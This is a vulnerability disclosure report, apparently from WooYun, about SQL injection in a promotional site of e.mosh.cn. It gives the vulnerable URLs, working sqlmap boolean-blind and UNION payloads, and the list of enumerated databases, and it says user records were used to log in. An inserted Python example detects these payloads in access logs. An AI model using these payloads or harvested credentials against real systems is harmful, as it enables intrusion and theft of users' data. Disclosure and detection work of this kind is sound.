2014-03-09: Details reported to the vendor, awaiting handling
2014-03-10: Vendor confirmed; details disclosed to the vendor only
2014-03-20: Details disclosed to core white hats and experts in the relevant field
2014-03-30: Details disclosed to ordinary white hats
2014-04-09: Details disclosed to intern white hats
2014-04-23: Details disclosed to the public

SQL injection in one of the vendor's websites during a promotional campaign

Vulnerable URL 1: http://e.mosh.cn/contectus/getContent?a_id=4
Vulnerable URL 2: http://e.mosh.cn/god/getcontent?a_id=62
---
Place: GET
Parameter: a_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: a_id=4 AND 4566=4566

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: a_id=-3600 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,107,119,122,58),CHAR(78,86,111,105,72,119,72,102,73,120),CHAR(58,105,107,108,58)), NULL, NULL, NULL, NULL, NULL#
---
available databases [8]:
[*] furniture_show
[*] information_schema
[*] mosh
[*] mosh_model
[*] mosh_stat
[*] mosh_tuan
[*] newmosh
[*] test

Database: furniture_show [79 tables]
Database: test [17 tables]
Database: mosh_stat [3 tables]
Database: mosh_tuan [23 tables]
Database: information_schema [17 tables]
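The two techniques sqlmap reported above (a boolean tautology appended to a_id, and a UNION SELECT carrying CONCAT(CHAR(...)) markers) leave distinctive traces in the web server's access log. As an added example that is not part of the original report, the following Python scans constructed access-log lines for those traces on the two paths named in the report, and also shows the input check the application was missing: a_id must be a plain numeric identifier. The client IPs and timestamps are constructed sample values.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic), shaped like the
# payloads sqlmap reported for the a_id parameter in this report.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Mar/2014:10:01:02 +0800] "GET /contectus/getContent?a_id=4 HTTP/1.1" 200 5120
203.0.113.5 - - [09/Mar/2014:10:01:03 +0800] "GET /contectus/getContent?a_id=4%20AND%204566%3D4566 HTTP/1.1" 200 5120
203.0.113.5 - - [09/Mar/2014:10:01:04 +0800] "GET /god/getcontent?a_id=-3600%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(CHAR(58,107,119,122,58)),NULL%23 HTTP/1.1" 200 410
198.51.100.7 - - [09/Mar/2014:10:02:00 +0800] "GET /god/getcontent?a_id=62 HTTP/1.1" 200 7000
"""

# Extract the request target from a common/combined log format line.
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Signatures for the two injection techniques identified by sqlmap:
# a tautology such as "AND 4566=4566", and UNION SELECT with CONCAT(CHAR( markers.
SIGNATURES = {
    "boolean_tautology": re.compile(r"\b(and|or)\s+(\d+)\s*=\s*\2\b", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "concat_char": re.compile(r"\bconcat\s*\(\s*char\s*\(", re.I),
}


def is_well_formed_id(value: str) -> bool:
    """a_id is a numeric identifier; anything else (including '-3600') is rejected.
    Enforcing this, together with a parameterized query, removes the injection."""
    return value.isdigit()


def scan_log(text: str) -> list:
    """Return (source_ip, path, param, [matched signatures]) for each request
    whose query parameter is either malformed or matches an injection signature."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue
        ip = line.split(" ", 1)[0]
        url = urlsplit(m.group(1))
        # parse_qs percent-decodes values, so signatures run on the decoded form.
        for name, values in parse_qs(url.query, keep_blank_values=True).items():
            for decoded in values:
                hits = [sig for sig, rx in SIGNATURES.items() if rx.search(decoded)]
                if hits or not is_well_formed_id(decoded):
                    findings.append((ip, url.path, name, hits))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```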
Total number of users in the newmosh database:
Logging in with the 2nd and 3rd records above:
The data is shown only as proof; no large volume of user information was retrieved. The mosh database holds 600,000-plus records, probably an old database; I believe the other databases also contain some user information. mosh_tuan contains a large amount of order and billing information, which I am not posting.
Fix it properly, and keep up the good work.
Severity: High
Vulnerability Rank: 18
Confirmed: 2014-03-10 09:29
Yes, we will definitely work hard and fix it properly. Thank you very much!
None yet
WooYun classified it as a small vendor; although it got rank 18, I actually only received 4 rank. Sob, heartbroken, I got almost nothing.
@Mr .LZH Same here, damn WooYun!!